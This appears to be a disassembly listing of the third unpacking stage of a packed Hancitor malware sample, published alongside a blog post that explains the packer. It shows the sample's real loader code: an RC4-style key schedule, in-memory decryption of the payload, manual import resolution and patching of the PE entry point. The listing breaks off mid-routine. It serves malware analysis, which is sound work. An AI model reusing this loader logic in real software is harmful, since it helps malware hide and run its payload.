Module 3

Module three inside packed Hancitor sample with SHA1: 37f6f1f59bf7952fd7182deeb07d4cd0d367dd59
The below dissassembly output is part of the blog: Hancitor packer demystified If you landed here via Google, you probably want to go to the home page instead

debug028:002303D7 ; --------------------------------------------------------------------------- debug028:002303D7 debug028:002303D7 loc_2303D7: ; CODE XREF: my_module_2+3D3↑j debug028:002303D7 50 push eax debug028:002303D8 8B 85 4C FF FF FF mov eax, [ebp+var_B4] debug028:002303DE FF E0 jmp eax debug028:002303DE my_module_2 endp ; sp-analysis failed debug028:002303DE debug028:002303DE ; --------------------------------------------------------------------------- debug028:002303E0 88 BA C5 70 dd 70C5BA88h debug028:002303E4 debug028:002303E4 ; =============== S U B R O U T I N E ======================================= debug028:002303E4 debug028:002303E4 debug028:002303E4 my_module_3 proc near ; DATA XREF: debug007:0018FED4↑o debug028:002303E4 58 pop eax debug028:002303E5 68 14 05 00 00 push 514h debug028:002303EA BA B6 B3 00 00 mov edx, 0B3B6h debug028:002303EF 81 C2 00 00 40 00 add edx, offset dword_400000 debug028:002303F5 52 push edx debug028:002303F6 B8 6D 26 00 00 mov eax, 266Dh debug028:002303FB 05 00 00 40 00 add eax, offset dword_400000 debug028:00230400 50 push eax debug028:00230401 FF 55 D0 call dword ptr [ebp-30h] ; call memcpy debug028:00230404 83 C4 0C add esp, 0Ch debug028:00230407 68 E8 03 00 00 push 3E8h debug028:0023040C B9 CE AF 00 00 mov ecx, 0AFCEh debug028:00230411 81 C1 00 00 40 00 add ecx, offset dword_400000 debug028:00230417 51 push ecx debug028:00230418 BA 77 51 00 00 mov edx, 5177h debug028:0023041D 81 C2 00 00 40 00 add edx, offset dword_400000 debug028:00230423 52 push edx debug028:00230424 FF 55 D0 call dword ptr [ebp-30h] ; call memcpy debug028:00230427 83 C4 0C add esp, 0Ch debug028:0023042A 68 80 0C 00 00 push 0C80h debug028:0023042F B8 4E A3 00 00 mov eax, 0A34Eh debug028:00230434 05 00 00 40 00 add eax, offset dword_400000 debug028:00230439 50 push eax debug028:0023043A B9 A1 87 00 00 mov ecx, 87A1h debug028:0023043F 81 C1 00 00 40 00 add ecx, offset dword_400000 debug028:00230445 51 push ecx debug028:00230446 FF 55 D0 call dword ptr [ebp-30h] ; call memcpy debug028:00230449 83 C4 0C add esp, 0Ch debug028:0023044C 50 push eax debug028:0023044D E8 00 00 00 00 call $+5 debug028:00230452 58 pop eax debug028:00230453 EB 10 jmp short loc_230465 debug028:00230453 ; --------------------------------------------------------------------------- debug028:00230455 A7 68 FD 23 dword_230455 dd 23FD68A7h debug028:00230459 1E A3 B9 CF dd 0CFB9A31Eh debug028:0023045D 68 E5 DE EF dd 0EFDEE568h debug028:00230461 C1 AD E1 34 dword_230461 dd 34E1ADC1h debug028:00230465 ; --------------------------------------------------------------------------- debug028:00230465 debug028:00230465 loc_230465: ; CODE XREF: my_module_3+6F↑j debug028:00230465 83 C0 03 add eax, 3 debug028:00230468 debug028:00230468 loc_230468: debug028:00230468 89 85 3C FF FF FF mov [ebp-0C4h], eax debug028:0023046E 58 pop eax debug028:0023046F C7 85 44 FF FF FF 10 00 00 00 mov dword ptr [ebp-0BCh], 10h debug028:00230479 BA 00 10 00 00 mov edx, 1000h debug028:0023047E 81 C2 00 00 40 00 add edx, offset dword_400000 debug028:00230484 89 95 6C FF FF FF mov [ebp-94h], edx debug028:0023048A C7 45 D4 4E 93 00 00 mov dword ptr [ebp-2Ch], 934Eh debug028:00230491 C7 45 F8 00 00 00 00 mov dword ptr [ebp-8], 0 debug028:00230498 EB 09 jmp short loc_2304A3 debug028:0023049A ; --------------------------------------------------------------------------- debug028:0023049A debug028:0023049A create_value_range_0_to_ff: ; CODE XREF: my_module_3+D5↓j debug028:0023049A 8B 45 F8 mov eax, [ebp-8] debug028:0023049D 83 C0 01 add eax, 1 debug028:002304A0 89 45 F8 mov [ebp-8], eax debug028:002304A3 debug028:002304A3 loc_2304A3: ; CODE XREF: my_module_3+B4↑j debug028:002304A3 81 7D F8 00 01 00 00 cmp dword ptr [ebp-8], 100h debug028:002304AA 74 0F jz short loc_2304BB debug028:002304AC 8B 4D F8 mov ecx, [ebp-8] debug028:002304AF 8A 55 F8 mov dl, [ebp-8] debug028:002304B2 88 94 0D F8 FD FF FF mov [ebp+ecx-208h], dl debug028:002304B9 EB DF jmp short create_value_range_0_to_ff debug028:002304BB ; --------------------------------------------------------------------------- debug028:002304BB debug028:002304BB loc_2304BB: ; CODE XREF: my_module_3+C6↑j debug028:002304BB C7 45 E8 00 00 00 00 mov dword ptr [ebp-18h], 0 debug028:002304C2 8B 45 E8 mov eax, [ebp-18h] debug028:002304C5 89 45 F8 mov [ebp-8], eax debug028:002304C8 EB 09 jmp short loc_2304D3 debug028:002304CA ; --------------------------------------------------------------------------- debug028:002304CA debug028:002304CA fiddle_value_range_with_key: ; CODE XREF: my_module_3+157↓j debug028:002304CA 8B 4D F8 mov ecx, [ebp-8] debug028:002304CD 83 C1 01 add ecx, 1 debug028:002304D0 89 4D F8 mov [ebp-8], ecx debug028:002304D3 debug028:002304D3 loc_2304D3: ; CODE XREF: my_module_3+E4↑j debug028:002304D3 81 7D F8 00 01 00 00 cmp dword ptr [ebp-8], 100h debug028:002304DA 74 61 jz short loc_23053D debug028:002304DC 8B 45 F8 mov eax, [ebp-8] debug028:002304DF 33 D2 xor edx, edx debug028:002304E1 F7 B5 44 FF FF FF div dword ptr [ebp-0BCh] debug028:002304E7 8B 85 3C FF FF FF mov eax, [ebp-0C4h] debug028:002304ED 0F B6 04 10 movzx eax, byte ptr [eax+edx] debug028:002304F1 03 45 E8 add eax, [ebp-18h] debug028:002304F4 8B 4D F8 mov ecx, [ebp-8] debug028:002304F7 0F B6 94 0D F8 FD FF FF movzx edx, byte ptr [ebp+ecx-208h] debug028:002304FF 03 C2 add eax, edx debug028:00230501 33 D2 xor edx, edx debug028:00230503 B9 00 01 00 00 mov ecx, 100h debug028:00230508 F7 F1 div ecx debug028:0023050A 89 55 E8 mov [ebp-18h], edx debug028:0023050D 8B 55 F8 mov edx, [ebp-8] debug028:00230510 8A 84 15 F8 FD FF FF mov al, [ebp+edx-208h] debug028:00230517 88 45 F7 mov [ebp-9], al debug028:0023051A 8B 4D F8 mov ecx, [ebp-8] debug028:0023051D 8B 55 E8 mov edx, [ebp-18h] debug028:00230520 8A 84 15 F8 FD FF FF mov al, [ebp+edx-208h] debug028:00230527 88 84 0D F8 FD FF FF mov [ebp+ecx-208h], al debug028:0023052E 8B 4D E8 mov ecx, [ebp-18h] debug028:00230531 8A 55 F7 mov dl, [ebp-9] debug028:00230534 88 94 0D F8 FD FF FF mov [ebp+ecx-208h], dl debug028:0023053B EB 8D jmp short fiddle_value_range_with_key debug028:0023053D ; --------------------------------------------------------------------------- debug028:0023053D debug028:0023053D loc_23053D: ; CODE XREF: my_module_3+F6↑j debug028:0023053D C7 45 E8 00 00 00 00 mov dword ptr [ebp-18h], 0 debug028:00230544 8B 45 E8 mov eax, [ebp-18h] debug028:00230547 89 45 F8 mov [ebp-8], eax debug028:0023054A 6A 04 push 4 debug028:0023054C 68 00 10 00 00 push 1000h debug028:00230551 8B 4D D4 mov ecx, [ebp-2Ch] debug028:00230554 C1 E1 02 shl ecx, 2 debug028:00230557 51 push ecx debug028:00230558 6A 00 push 0 debug028:0023055A FF 55 B8 call dword ptr [ebp-48h] ; call virtualalloc debug028:0023055D 89 45 C0 mov [ebp-40h], eax debug028:00230560 C7 45 FC 00 00 00 00 mov dword ptr [ebp-4], 0 debug028:00230567 EB 09 jmp short loc_230572 debug028:00230569 ; --------------------------------------------------------------------------- debug028:00230569 debug028:00230569 loc_230569: ; CODE XREF: my_module_3+1A2↓j debug028:00230569 8B 55 FC mov edx, [ebp-4] debug028:0023056C 83 C2 01 add edx, 1 debug028:0023056F 89 55 FC mov [ebp-4], edx debug028:00230572 debug028:00230572 loc_230572: ; CODE XREF: my_module_3+183↑j debug028:00230572 8B 45 FC mov eax, [ebp-4] debug028:00230575 3B 45 D4 cmp eax, [ebp-2Ch] debug028:00230578 73 0E jnb short loc_230588 debug028:0023057A 8B 4D FC mov ecx, [ebp-4] debug028:0023057D 8B 55 C0 mov edx, [ebp-40h] debug028:00230580 8B 45 FC mov eax, [ebp-4] debug028:00230583 89 04 8A mov [edx+ecx*4], eax debug028:00230586 EB E1 jmp short loc_230569 debug028:00230588 ; --------------------------------------------------------------------------- debug028:00230588 debug028:00230588 loc_230588: ; CODE XREF: my_module_3+194↑j debug028:00230588 6A 04 push 4 debug028:0023058A 68 00 10 00 00 push 1000h debug028:0023058F 8B 4D D4 mov ecx, [ebp-2Ch] debug028:00230592 C1 E1 02 shl ecx, 2 debug028:00230595 51 push ecx debug028:00230596 6A 00 push 0 debug028:00230598 FF 55 B8 call dword ptr [ebp-48h] ; call virtualalloc debug028:0023059B 89 45 84 mov [ebp-7Ch], eax debug028:0023059E C7 45 FC 00 00 00 00 mov dword ptr [ebp-4], 0 debug028:002305A5 EB 09 jmp short loc_2305B0 debug028:002305A7 ; --------------------------------------------------------------------------- debug028:002305A7 debug028:002305A7 loc_2305A7: ; CODE XREF: my_module_3+2C9↓j debug028:002305A7 8B 55 FC mov edx, [ebp-4] debug028:002305AA 83 C2 01 add edx, 1 debug028:002305AD 89 55 FC mov [ebp-4], edx debug028:002305B0 debug028:002305B0 loc_2305B0: ; CODE XREF: my_module_3+1C1↑j debug028:002305B0 8B 45 FC mov eax, [ebp-4] debug028:002305B3 3B 45 D4 cmp eax, [ebp-2Ch] debug028:002305B6 0F 83 F6 00 00 00 jnb loc_2306B2 debug028:002305BC 8B 4D D4 mov ecx, [ebp-2Ch] debug028:002305BF 2B 4D FC sub ecx, [ebp-4] debug028:002305C2 89 4D 94 mov [ebp-6Ch], ecx debug028:002305C5 C7 45 E4 00 00 00 00 mov dword ptr [ebp-1Ch], 0 debug028:002305CC EB 09 jmp short loc_2305D7 debug028:002305CE ; --------------------------------------------------------------------------- debug028:002305CE debug028:002305CE loc_2305CE: ; CODE XREF: my_module_3+284↓j debug028:002305CE 8B 55 E4 mov edx, [ebp-1Ch] debug028:002305D1 83 C2 01 add edx, 1 debug028:002305D4 89 55 E4 mov [ebp-1Ch], edx debug028:002305D7 debug028:002305D7 loc_2305D7: ; CODE XREF: my_module_3+1E8↑j debug028:002305D7 83 7D E4 04 cmp dword ptr [ebp-1Ch], 4 debug028:002305DB 0F 83 8C 00 00 00 jnb loc_23066D debug028:002305E1 8B 45 F8 mov eax, [ebp-8] debug028:002305E4 83 C0 01 add eax, 1 debug028:002305E7 33 D2 xor edx, edx debug028:002305E9 B9 00 01 00 00 mov ecx, 100h debug028:002305EE F7 F1 div ecx debug028:002305F0 89 55 F8 mov [ebp-8], edx debug028:002305F3 8B 55 F8 mov edx, [ebp-8] debug028:002305F6 0F B6 84 15 F8 FD FF FF movzx eax, byte ptr [ebp+edx-208h] debug028:002305FE 03 45 E8 add eax, [ebp-18h] debug028:00230601 33 D2 xor edx, edx debug028:00230603 B9 00 01 00 00 mov ecx, 100h debug028:00230608 F7 F1 div ecx debug028:0023060A 89 55 E8 mov [ebp-18h], edx debug028:0023060D 8B 55 E8 mov edx, [ebp-18h] debug028:00230610 8A 84 15 F8 FD FF FF mov al, [ebp+edx-208h] debug028:00230617 88 45 F7 mov [ebp-9], al debug028:0023061A 8B 4D E8 mov ecx, [ebp-18h] debug028:0023061D 8B 55 F8 mov edx, [ebp-8] debug028:00230620 8A 84 15 F8 FD FF FF mov al, [ebp+edx-208h] debug028:00230627 88 84 0D F8 FD FF FF mov [ebp+ecx-208h], al debug028:0023062E 8B 4D F8 mov ecx, [ebp-8] debug028:00230631 8A 55 F7 mov dl, [ebp-9] debug028:00230634 88 94 0D F8 FD FF FF mov [ebp+ecx-208h], dl debug028:0023063B 0F B6 45 F7 movzx eax, byte ptr [ebp-9] debug028:0023063F 8B 4D E8 mov ecx, [ebp-18h] debug028:00230642 0F B6 94 0D F8 FD FF FF movzx edx, byte ptr [ebp+ecx-208h] debug028:0023064A 03 C2 add eax, edx debug028:0023064C 25 FF 00 00 80 and eax, 800000FFh debug028:00230651 79 07 jns short loc_23065A debug028:00230653 48 dec eax debug028:00230654 0D 00 FF FF FF or eax, 0FFFFFF00h debug028:00230659 40 inc eax debug028:0023065A debug028:0023065A loc_23065A: ; CODE XREF: my_module_3+26D↑j debug028:0023065A 8B 4D E4 mov ecx, [ebp-1Ch] debug028:0023065D 8A 94 05 F8 FD FF FF mov dl, [ebp+eax-208h] debug028:00230664 88 54 0D 80 mov [ebp+ecx-80h], dl debug028:00230668 E9 61 FF FF FF jmp loc_2305CE debug028:0023066D ; --------------------------------------------------------------------------- debug028:0023066D debug028:0023066D loc_23066D: ; CODE XREF: my_module_3+1F7↑j debug028:0023066D 8B 45 80 mov eax, [ebp-80h] debug028:00230670 3B 45 94 cmp eax, [ebp-6Ch] debug028:00230673 72 0D jb short loc_230682 debug028:00230675 8B 45 80 mov eax, [ebp-80h] debug028:00230678 33 D2 xor edx, edx debug028:0023067A F7 75 94 div dword ptr [ebp-6Ch] debug028:0023067D 89 55 9C mov [ebp-64h], edx debug028:00230680 EB 06 jmp short loc_230688 debug028:00230682 ; --------------------------------------------------------------------------- debug028:00230682 debug028:00230682 loc_230682: ; CODE XREF: my_module_3+28F↑j debug028:00230682 8B 4D 80 mov ecx, [ebp-80h] debug028:00230685 89 4D 9C mov [ebp-64h], ecx debug028:00230688 debug028:00230688 loc_230688: ; CODE XREF: my_module_3+29C↑j debug028:00230688 8B 55 FC mov edx, [ebp-4] debug028:0023068B 8B 45 84 mov eax, [ebp-7Ch] debug028:0023068E 8B 4D 9C mov ecx, [ebp-64h] debug028:00230691 8B 75 C0 mov esi, [ebp-40h] debug028:00230694 8B 0C 8E mov ecx, [esi+ecx*4] debug028:00230697 89 0C 90 mov [eax+edx*4], ecx debug028:0023069A 8B 55 9C mov edx, [ebp-64h] debug028:0023069D 8B 45 C0 mov eax, [ebp-40h] debug028:002306A0 8B 4D 94 mov ecx, [ebp-6Ch] debug028:002306A3 8B 75 C0 mov esi, [ebp-40h] debug028:002306A6 8B 4C 8E FC mov ecx, [esi+ecx*4-4] debug028:002306AA 89 0C 90 mov [eax+edx*4], ecx debug028:002306AD E9 F5 FE FF FF jmp loc_2305A7 debug028:002306B2 ; --------------------------------------------------------------------------- debug028:002306B2 debug028:002306B2 loc_2306B2: ; CODE XREF: my_module_3+1D2↑j debug028:002306B2 68 00 80 00 00 push 8000h debug028:002306B7 6A 00 push 0 debug028:002306B9 8B 55 C0 mov edx, [ebp-40h] debug028:002306BC 52 push edx debug028:002306BD FF 55 B0 call dword ptr [ebp-50h] ; call virtualfree debug028:002306C0 6A 04 push 4 debug028:002306C2 68 00 10 00 00 push 1000h debug028:002306C7 8B 45 D4 mov eax, [ebp-2Ch] debug028:002306CA 50 push eax debug028:002306CB 6A 00 push 0 debug028:002306CD FF 55 B8 call dword ptr [ebp-48h] ; call virtualloc debug028:002306D0 89 45 8C mov [ebp-74h], eax debug028:002306D3 8B 4D D4 mov ecx, [ebp-2Ch] debug028:002306D6 51 push ecx debug028:002306D7 8B 95 6C FF FF FF mov edx, [ebp-94h] debug028:002306DD 52 push edx debug028:002306DE 8B 45 8C mov eax, [ebp-74h] debug028:002306E1 50 push eax debug028:002306E2 debug028:002306E2 copy_encrypted_bytes_to_buffer_region: ; call memcpy debug028:002306E2 FF 55 D0 call dword ptr [ebp-30h] debug028:002306E5 83 C4 0C add esp, 0Ch debug028:002306E8 C7 45 FC 00 00 00 00 mov dword ptr [ebp-4], 0 debug028:002306EF EB 09 jmp short loc_2306FA debug028:002306F1 ; --------------------------------------------------------------------------- debug028:002306F1 debug028:002306F1 loc_2306F1: ; CODE XREF: my_module_3+338↓j debug028:002306F1 8B 4D FC mov ecx, [ebp-4] debug028:002306F4 83 C1 01 add ecx, 1 debug028:002306F7 89 4D FC mov [ebp-4], ecx debug028:002306FA debug028:002306FA loc_2306FA: ; CODE XREF: my_module_3+30B↑j debug028:002306FA 8B 55 FC mov edx, [ebp-4] debug028:002306FD 3B 55 D4 cmp edx, [ebp-2Ch] debug028:00230700 73 1C jnb short loc_23071E debug028:00230702 8B 45 FC mov eax, [ebp-4] debug028:00230705 8B 4D 84 mov ecx, [ebp-7Ch] debug028:00230708 8B 14 81 mov edx, [ecx+eax*4] debug028:0023070B 8B 45 8C mov eax, [ebp-74h] debug028:0023070E 03 45 FC add eax, [ebp-4] debug028:00230711 8B 8D 6C FF FF FF mov ecx, [ebp-94h] debug028:00230717 8A 00 mov al, [eax] debug028:00230719 88 04 11 mov [ecx+edx], al debug028:0023071C EB D3 jmp short loc_2306F1 debug028:0023071E ; --------------------------------------------------------------------------- debug028:0023071E debug028:0023071E loc_23071E: ; CODE XREF: my_module_3+31C↑j debug028:0023071E 68 00 80 00 00 push 8000h debug028:00230723 6A 00 push 0 debug028:00230725 8B 4D 8C mov ecx, [ebp-74h] debug028:00230728 51 push ecx debug028:00230729 FF 55 B0 call dword ptr [ebp-50h] ; call virtualfree debug028:0023072C 68 00 80 00 00 push 8000h debug028:00230731 6A 00 push 0 debug028:00230733 8B 55 84 mov edx, [ebp-7Ch] debug028:00230736 52 push edx debug028:00230737 FF 55 B0 call dword ptr [ebp-50h] ; call virtualfree debug028:0023073A 6A 04 push 4 debug028:0023073C 68 00 10 00 00 push 1000h debug028:00230741 68 00 80 00 00 push 8000h debug028:00230746 6A 00 push 0 debug028:00230748 FF 55 B8 call dword ptr [ebp-48h] ; call virtualalloc debug028:0023074B 89 45 CC mov [ebp-34h], eax debug028:0023074E 68 00 80 00 00 push 8000h debug028:00230753 6A 00 push 0 debug028:00230755 8B 45 CC mov eax, [ebp-34h] debug028:00230758 50 push eax debug028:00230759 FF 95 74 FF FF FF call dword ptr [ebp-8Ch] ; call memset debug028:0023075F 83 C4 0C add esp, 0Ch debug028:00230762 B9 9F 67 00 00 mov ecx, 679Fh debug028:00230767 81 C1 00 00 40 00 add ecx, offset dword_400000 debug028:0023076D 89 4D EC mov [ebp-14h], ecx debug028:00230770 debug028:00230770 loc_230770: ; CODE XREF: my_module_3+448↓j debug028:00230770 8B 55 EC mov edx, [ebp-14h] debug028:00230773 83 7A 04 00 cmp dword ptr [edx+4], 0 debug028:00230777 75 05 jnz short loc_23077E debug028:00230779 E9 B3 00 00 00 jmp loc_230831 debug028:0023077E ; --------------------------------------------------------------------------- debug028:0023077E debug028:0023077E loc_23077E: ; CODE XREF: my_module_3+393↑j debug028:0023077E 8B 45 EC mov eax, [ebp-14h] debug028:00230781 83 38 00 cmp dword ptr [eax], 0 debug028:00230784 74 75 jz short loc_2307FB debug028:00230786 8B 4D EC mov ecx, [ebp-14h] debug028:00230789 8B 51 08 mov edx, [ecx+8] debug028:0023078C 52 push edx debug028:0023078D 8B 45 EC mov eax, [ebp-14h] debug028:00230790 8B 08 mov ecx, [eax] debug028:00230792 81 C1 00 00 40 00 add ecx, offset dword_400000 debug028:00230798 51 push ecx debug028:00230799 8B 55 EC mov edx, [ebp-14h] debug028:0023079C 8B 42 04 mov eax, [edx+4] debug028:0023079F 8B 4D CC mov ecx, [ebp-34h] debug028:002307A2 8D 94 01 00 F0 FF FF lea edx, [ecx+eax-1000h] debug028:002307A9 52 push edx debug028:002307AA FF 55 D0 call dword ptr [ebp-30h] ; call memcpy debug028:002307AD 83 C4 0C add esp, 0Ch debug028:002307B0 C7 45 BC 00 00 00 00 mov dword ptr [ebp-44h], 0 debug028:002307B7 EB 09 jmp short loc_2307C2 debug028:002307B9 ; --------------------------------------------------------------------------- debug028:002307B9 debug028:002307B9 loc_2307B9: ; CODE XREF: my_module_3+413↓j debug028:002307B9 8B 45 BC mov eax, [ebp-44h] debug028:002307BC 83 C0 01 add eax, 1 debug028:002307BF 89 45 BC mov [ebp-44h], eax debug028:002307C2 debug028:002307C2 loc_2307C2: ; CODE XREF: my_module_3+3D3↑j debug028:002307C2 8B 4D EC mov ecx, [ebp-14h] debug028:002307C5 8B 55 BC mov edx, [ebp-44h] debug028:002307C8 3B 51 08 cmp edx, [ecx+8] debug028:002307CB 73 2C jnb short loc_2307F9 debug028:002307CD 8B 45 EC mov eax, [ebp-14h] debug028:002307D0 8B 4D CC mov ecx, [ebp-34h] debug028:002307D3 03 48 04 add ecx, [eax+4] debug028:002307D6 8B 55 BC mov edx, [ebp-44h] debug028:002307D9 0F B6 84 11 00 F0 FF FF movzx eax, byte ptr [ecx+edx-1000h] debug028:002307E1 83 F0 04 xor eax, 4 debug028:002307E4 8B 4D EC mov ecx, [ebp-14h] debug028:002307E7 8B 55 CC mov edx, [ebp-34h] debug028:002307EA 03 51 04 add edx, [ecx+4] debug028:002307ED 8B 4D BC mov ecx, [ebp-44h] debug028:002307F0 88 84 0A 00 F0 FF FF mov [edx+ecx-1000h], al debug028:002307F7 EB C0 jmp short loc_2307B9 debug028:002307F9 ; --------------------------------------------------------------------------- debug028:002307F9 debug028:002307F9 loc_2307F9: ; CODE XREF: my_module_3+3E7↑j debug028:002307F9 EB 28 jmp short loc_230823 debug028:002307FB ; --------------------------------------------------------------------------- debug028:002307FB debug028:002307FB loc_2307FB: ; CODE XREF: my_module_3+3A0↑j debug028:002307FB 8B 55 EC mov edx, [ebp-14h] debug028:002307FE 8B 42 08 mov eax, [edx+8] debug028:00230801 50 push eax debug028:00230802 8B 4D EC mov ecx, [ebp-14h] debug028:00230805 8B 51 0C mov edx, [ecx+0Ch] debug028:00230808 52 push edx debug028:00230809 8B 45 EC mov eax, [ebp-14h] debug028:0023080C 8B 48 04 mov ecx, [eax+4] debug028:0023080F 8B 55 CC mov edx, [ebp-34h] debug028:00230812 8D 84 0A 00 F0 FF FF lea eax, [edx+ecx-1000h] debug028:00230819 50 push eax debug028:0023081A FF 95 74 FF FF FF call dword ptr [ebp-8Ch] ; call memset debug028:00230820 83 C4 0C add esp, 0Ch debug028:00230823 debug028:00230823 loc_230823: ; CODE XREF: my_module_3:loc_2307F9↑j debug028:00230823 8B 4D EC mov ecx, [ebp-14h] debug028:00230826 83 C1 10 add ecx, 10h debug028:00230829 89 4D EC mov [ebp-14h], ecx debug028:0023082C E9 3F FF FF FF jmp loc_230770 debug028:00230831 ; --------------------------------------------------------------------------- debug028:00230831 debug028:00230831 loc_230831: ; CODE XREF: my_module_3+395↑j debug028:00230831 68 00 80 00 00 push 8000h debug028:00230836 8B 55 CC mov edx, [ebp-34h] debug028:00230839 52 push edx debug028:0023083A B8 00 10 00 00 mov eax, 1000h debug028:0023083F 05 00 00 40 00 add eax, offset dword_400000 debug028:00230844 50 push eax debug028:00230845 debug028:00230845 copy_decrypted_bytes_from_buffer_region: ; call memcpy debug028:00230845 FF 55 D0 call dword ptr [ebp-30h] debug028:00230848 83 C4 0C add esp, 0Ch debug028:0023084B 68 00 80 00 00 push 8000h debug028:00230850 6A 00 push 0 debug028:00230852 8B 4D CC mov ecx, [ebp-34h] debug028:00230855 51 push ecx debug028:00230856 FF 55 B0 call dword ptr [ebp-50h] ; call virtualfree debug028:00230859 BA 01 00 00 00 mov edx, 1 debug028:0023085E 85 D2 test edx, edx debug028:00230860 0F 84 21 01 00 00 jz loc_230987 debug028:00230866 B8 98 6A 00 00 mov eax, 6A98h debug028:0023086B 05 00 00 40 00 add eax, offset dword_400000 debug028:00230870 89 45 C8 mov [ebp-38h], eax debug028:00230873 debug028:00230873 resolve_apis: ; CODE XREF: my_module_3+59E↓j debug028:00230873 8B 4D C8 mov ecx, [ebp-38h] debug028:00230876 83 79 10 00 cmp dword ptr [ecx+10h], 0 debug028:0023087A 75 05 jnz short loc_230881 debug028:0023087C E9 06 01 00 00 jmp loc_230987 debug028:00230881 ; --------------------------------------------------------------------------- debug028:00230881 debug028:00230881 loc_230881: ; CODE XREF: my_module_3+496↑j debug028:00230881 8B 55 C8 mov edx, [ebp-38h] debug028:00230884 8B 42 0C mov eax, [edx+0Ch] debug028:00230887 05 00 00 40 00 add eax, offset dword_400000 debug028:0023088C 89 85 68 FF FF FF mov [ebp-98h], eax debug028:00230892 8B 8D 68 FF FF FF mov ecx, [ebp-98h] debug028:00230898 51 push ecx debug028:00230899 FF 95 70 FF FF FF call dword ptr [ebp-90h] ; call getmodulehandlea debug028:0023089F 89 45 AC mov [ebp-54h], eax debug028:002308A2 83 7D AC 00 cmp dword ptr [ebp-54h], 0 debug028:002308A6 75 10 jnz short loc_2308B8 debug028:002308A8 8B 95 68 FF FF FF mov edx, [ebp-98h] debug028:002308AE 52 push edx debug028:002308AF FF 95 34 FF FF FF call dword ptr [ebp-0CCh] ; call loadlibrarya debug028:002308B5 89 45 AC mov [ebp-54h], eax debug028:002308B8 debug028:002308B8 loc_2308B8: ; CODE XREF: my_module_3+4C2↑j debug028:002308B8 8B 45 C8 mov eax, [ebp-38h] debug028:002308BB 8B 48 10 mov ecx, [eax+10h] debug028:002308BE 81 C1 00 00 40 00 add ecx, offset dword_400000 debug028:002308C4 89 4D C4 mov [ebp-3Ch], ecx debug028:002308C7 C7 45 FC 00 00 00 00 mov dword ptr [ebp-4], 0 debug028:002308CE debug028:002308CE loc_2308CE: ; CODE XREF: my_module_3+590↓j debug028:002308CE 8B 55 C4 mov edx, [ebp-3Ch] debug028:002308D1 83 3A 00 cmp dword ptr [edx], 0 debug028:002308D4 75 05 jnz short loc_2308DB debug028:002308D6 E9 9E 00 00 00 jmp loc_230979 debug028:002308DB ; --------------------------------------------------------------------------- debug028:002308DB debug028:002308DB loc_2308DB: ; CODE XREF: my_module_3+4F0↑j debug028:002308DB 8B 45 C4 mov eax, [ebp-3Ch] debug028:002308DE 8B 08 mov ecx, [eax] debug028:002308E0 81 E1 00 00 00 80 and ecx, 80000000h debug028:002308E6 74 30 jz short loc_230918 debug028:002308E8 8B 55 C4 mov edx, [ebp-3Ch] debug028:002308EB 8B 02 mov eax, [edx] debug028:002308ED 25 FF FF FF 7F and eax, 7FFFFFFFh debug028:002308F2 50 push eax debug028:002308F3 8B 4D AC mov ecx, [ebp-54h] debug028:002308F6 51 push ecx debug028:002308F7 FF 55 D8 call dword ptr [ebp-28h] ; call getprocaddr debug028:002308FA 89 85 7C FF FF FF mov [ebp-84h], eax debug028:00230900 8B 55 C8 mov edx, [ebp-38h] debug028:00230903 8B 42 10 mov eax, [edx+10h] debug028:00230906 8B 4D FC mov ecx, [ebp-4] debug028:00230909 8B 95 7C FF FF FF mov edx, [ebp-84h] debug028:0023090F 89 94 88 00 00 40 00 mov dword_400000[eax+ecx*4], edx debug028:00230916 EB 4A jmp short loc_230962 debug028:00230918 ; --------------------------------------------------------------------------- debug028:00230918 debug028:00230918 loc_230918: ; CODE XREF: my_module_3+502↑j debug028:00230918 8B 45 C4 mov eax, [ebp-3Ch] debug028:0023091B 8B 08 mov ecx, [eax] debug028:0023091D 81 C1 00 00 40 00 add ecx, offset dword_400000 debug028:00230923 89 8D 2C FF FF FF mov [ebp-0D4h], ecx debug028:00230929 8B 95 2C FF FF FF mov edx, [ebp-0D4h] debug028:0023092F 83 C2 02 add edx, 2 debug028:00230932 89 95 24 FF FF FF mov [ebp-0DCh], edx debug028:00230938 8B 85 24 FF FF FF mov eax, [ebp-0DCh] debug028:0023093E 50 push eax debug028:0023093F 8B 4D AC mov ecx, [ebp-54h] debug028:00230942 51 push ecx debug028:00230943 FF 55 D8 call dword ptr [ebp-28h] ; call getprocaddr debug028:00230946 89 85 7C FF FF FF mov [ebp-84h], eax debug028:0023094C 8B 55 C8 mov edx, [ebp-38h] debug028:0023094F 8B 42 10 mov eax, [edx+10h] debug028:00230952 8B 4D FC mov ecx, [ebp-4] debug028:00230955 8B 95 7C FF FF FF mov edx, [ebp-84h] debug028:0023095B 89 94 88 00 00 40 00 mov dword_400000[eax+ecx*4], edx debug028:00230962 debug028:00230962 loc_230962: ; CODE XREF: my_module_3+532↑j debug028:00230962 8B 45 C4 mov eax, [ebp-3Ch] debug028:00230965 83 C0 04 add eax, 4 debug028:00230968 89 45 C4 mov [ebp-3Ch], eax debug028:0023096B 8B 4D FC mov ecx, [ebp-4] debug028:0023096E 83 C1 01 add ecx, 1 debug028:00230971 89 4D FC mov [ebp-4], ecx debug028:00230974 E9 55 FF FF FF jmp loc_2308CE debug028:00230979 ; --------------------------------------------------------------------------- debug028:00230979 debug028:00230979 loc_230979: ; CODE XREF: my_module_3+4F2↑j debug028:00230979 8B 55 C8 mov edx, [ebp-38h] debug028:0023097C 83 C2 14 add edx, 14h debug028:0023097F 89 55 C8 mov [ebp-38h], edx debug028:00230982 E9 EC FE FF FF jmp resolve_apis debug028:00230987 ; --------------------------------------------------------------------------- debug028:00230987 debug028:00230987 loc_230987: ; CODE XREF: my_module_3+47C↑j debug028:00230987 ; my_module_3+498↑j debug028:00230987 B8 3C 00 00 00 mov eax, 3Ch debug028:0023098C 8B 88 00 00 40 00 mov ecx, dword_400000[eax] debug028:00230992 81 C1 00 00 40 00 add ecx, offset dword_400000 debug028:00230998 89 4D E0 mov [ebp-20h], ecx ; ECX=address start PE header in memory debug028:0023099B BA 04 00 00 00 mov edx, 4 debug028:002309A0 8B 45 E0 mov eax, [ebp-20h] debug028:002309A3 66 89 50 06 mov [eax+6], dx debug028:002309A7 8B 4D E0 mov ecx, [ebp-20h] debug028:002309AA C7 41 28 F0 15 00 00 mov dword ptr [ecx+28h], 15F0h ; 0x28 = AddressOfEntryPoint debug028:002309AA ; at end of module three we will jump to 15F0 debug028:002309B1 BA 08 00 00 00 mov edx, 8 debug028:002309B6 C1 E2 00 shl edx, 0 debug028:002309B9 8B 45 E0 mov eax, [ebp-20h] debug028:002309BC C7 44 10 78 98 6A 00 00 mov dword ptr [eax+edx+78h], 6A98h ; 78+8=80 